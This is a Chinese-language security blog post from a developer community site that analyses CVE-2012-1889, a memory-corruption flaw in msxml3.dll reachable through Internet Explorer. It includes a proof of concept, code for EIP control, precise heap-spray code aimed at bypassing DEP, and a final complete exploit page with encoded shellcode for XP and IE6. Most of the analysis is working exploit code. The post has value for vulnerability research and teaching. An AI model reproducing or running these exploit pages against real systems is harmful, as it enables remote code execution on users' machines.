前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >暴雷漏洞

暴雷漏洞

原创
作者头像
极安御信安全研究院
发布2023-04-05 18:50:52
2170
发布2023-04-05 18:50:52
举报
文章被收录于专栏:极安御信安全研究院

作者丨黑蛋

一、漏洞简述

暴雷漏洞编号为cve-2012-1889,在2012年曝光的一种微软的XML核心组件漏洞,该漏洞属于缓冲区溢出,根据栈溢出可以控制EIP的位置。该漏洞产生于msxml3.dll模块中,msxml3.dll是微软的一个SAX2 帮助程序类。主要用途包括:XSL 转换 (XSLT) 和 XML 路径语言 (XPath) 的完全实现、对 XML (SAX2) 实现的简单 API 的修改,包括与万维网联合会 (W3C) 标准和 OASIS 测试套件保持更高一致性。影响版本IE6和IE8。

二、漏洞环境

系统版本

Win7x86Sp1、XPSp3

三、漏洞分析

3.1、漏洞验证

首先看POC,代码如下:

<html> <head>     <title>www.vultop.comtitle> head> <body>     <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='HD'>object>     <script>         document.getElementById("HD").object.definition(0); script> body> html>

双击POC,打开Windbg附加第二个IE,g起来,然后发现断在如下地方:

可以看到这里回溯的话可以发现ecx的值来自于栈中,这里对漏洞原理不再赘述。definition是作为属性使用,但是被当做方法传入参数的时候就触发了这个漏洞。

3.2、栈溢出控制EIP

<html> <head>     <title>www.vultop.comtitle> head> <body>     <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='HD'>object>     <script>        var obj = document.getElementById('HD').object;         var ImgPath = unescape("\u0C0C\u0C0C");         while (ImgPath.length < 0x1000)             ImgPath += ImgPath;         ImgPath = "\\\\1234" + ImgPath;         ImgPath = ImgPath.substr(0, 0x1000-10);         var emtPic = document.createElement("img");         emtPic.src = ImgPath;         emtPic.nameProp;           obj.definition(0); script> body> html>

这里把路径后面全部拷贝为0C0C0C0C,然后返回当前图片名,就可以载入路径。

在没有保护的情况下,通过堆喷射,nop+shellcode就可以成功利用。

3.3、精准喷射

由于DEP的存在,我们需要精准喷射。Windows使用内存分页机制管理内存,内存操作的最小单位为一个内存分页,一个内存分页4kb(0x1000)大小(64位系统中最大的内存分页为1G),则申请的一段堆空间中,这段堆空间首地址一定是0x1000的倍数,如果知道一个内存地址相对于其所在内存分页首地址的偏移,那么就可以构造一个内存分页大小的内存块,并在距离内存块首地址指定偏移的位置设置关键数据,然后以该内存块作为的最小单元进行堆喷,从而保证被内存堆喷射覆盖的指定内存地址处存在关键数据 首先我们选择堆喷射:

<html> <head>     <title>www.vultop.comtitle> head> <body>     <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='HD'>object>     <script>      var shellcode = unescape('%u0c0c%u0c0c'+                           '%u4141%u4141'+                         '%u4141%u4141'+                         '%u4141%u4141'+                         '%u4141%u4141'+                         '%u4141%u4141'+                         '%uaaaa%uaaaa'                              ); var var_C = unescape( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" ); while (var_C.length + 20 + 8 < 65536) var_C+=var_C;  //0x10000,64kb,减去28个shellcode长度 var_D = var_C.substring(0, (0x0c0c-0x24)/2);//0x24字节堆块信息 var_D += shellcode;  // 拼接shellcode var_D += var_C;      // 拼接滑块代码 var_E = var_D.substring(0, 65536/2); while(var_E.length < 0x80000) var_E += var_E;//一个块1MB var_H = var_E.substring(0, 0x80000); var var_F = new Array(); for (var_G=0;var_G<0x1f0;var_G++) var_F[var_G]=var_H;        var obj = document.getElementById('HD').object;         var ImgPath = unescape("\u0C0C\u0C0C");         while (ImgPath.length < 0x1000)             ImgPath += ImgPath;         ImgPath = "\\\\1234" + ImgPath;         ImgPath = ImgPath.substr(0, 0x1000-10);         var emtPic = document.createElement("img");         emtPic.src = ImgPath;         emtPic.nameProp;           obj.definition(0); script> body> html>

这里为了更好的观察,我用了x32dbg,,代码注释都在上面,放图,可以看到已经实现精准喷射,当然喷射有风险,随缘喷,多喷几次:

顺带看看内存分配情况:

3.4、构造ROP链(失败)

由于ASLR保护的存在,我们构造ROP链首先找到未开启ASLR保护的模块:

resource.dll和sogoupy.iem,用个der,俩个用不了。放弃了,这个漏洞就这么着吧

直接甩xp+IE6可以跑的EXP:

直接使用滑板指令+shellcode大面积喷射实现,没有任何保护。

<html> <head>     <title>www.vultop.comtitle> head> <body>     <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='HD'>object>     <script>      var mPayload = unescape("\u0C0C\u0C0C");      while(mPayload.length < 0x1000)      mPayload += mPayload;     var mSize=0x40000;  var shellcode=unescape("\u68FC\u0A6A\u1E38\u6368\uD189\u684F\u7432"+  "\u0C91\uF48B\u7E8D\u33F4\uB7DB\u2B04\u66E3\u33BB\u5332\u7568\u6573"+  "\u5472\uD233\u8B64\u305A\u4B8B\u8B0C\u1C49\u098B\u698B\uAD08\u6A3D"+  "\u380A\u751E\u9505\u57FF\u95F8\u8B60\u3C45\u4C8B\u7805\uCD03\u598B\u0320\u33DD\u47FF\u348B\u03BB\u99F5\uBE0F\u3A06"+  "\u74C4\uC108\u07CA\uD003\uEB46\u3BF1\u2454\u751C\u8BE4\u2459\uDD03\u8B66\u7B3C\u598B\u031C\u03DD\uBB2C\u5F95\u57AB"+  "\u3D61\u0A6A\u1E38\uA975\uDB33\u6853\u6577\u7473\u6668\u6961\u8B6C\u53C4\u5050\uFF53\uFC57\uFF53\uF857");      mPayload+=shellcode;     while(mPayload.length <= mSize)     mPayload += mPayload;     //mPayload = mPayload.substring(2,mSize-0x21);     mPayload = mPayload.substring(0,mSize);     //alert(mPayload.length.toString(16));     var mArray= new Array();     for (var i = 0; i < 800; i++) {  mArray[i] = mPayload.substr(0,mPayload.length); }        var obj = document.getElementById('HD').object;         var ImgPath = unescape("\u0C0C\u0C0C");         while (ImgPath.length < 0x1000)             ImgPath += ImgPath;         ImgPath = "\\\\1234" + ImgPath;         ImgPath = ImgPath.substr(0, 0x1000-10);         var emtPic = document.createElement("img");         emtPic.src = ImgPath;         emtPic.nameProp;           obj.definition(0); script> body> html>

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 一、漏洞简述
  • 二、漏洞环境
  • 三、漏洞分析
    • 3.1、漏洞验证
      • 3.2、栈溢出控制EIP
        • 3.3、精准喷射
          • 3.4、构造ROP链(失败)
            • 直接甩xp+IE6可以跑的EXP:
            领券
            问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档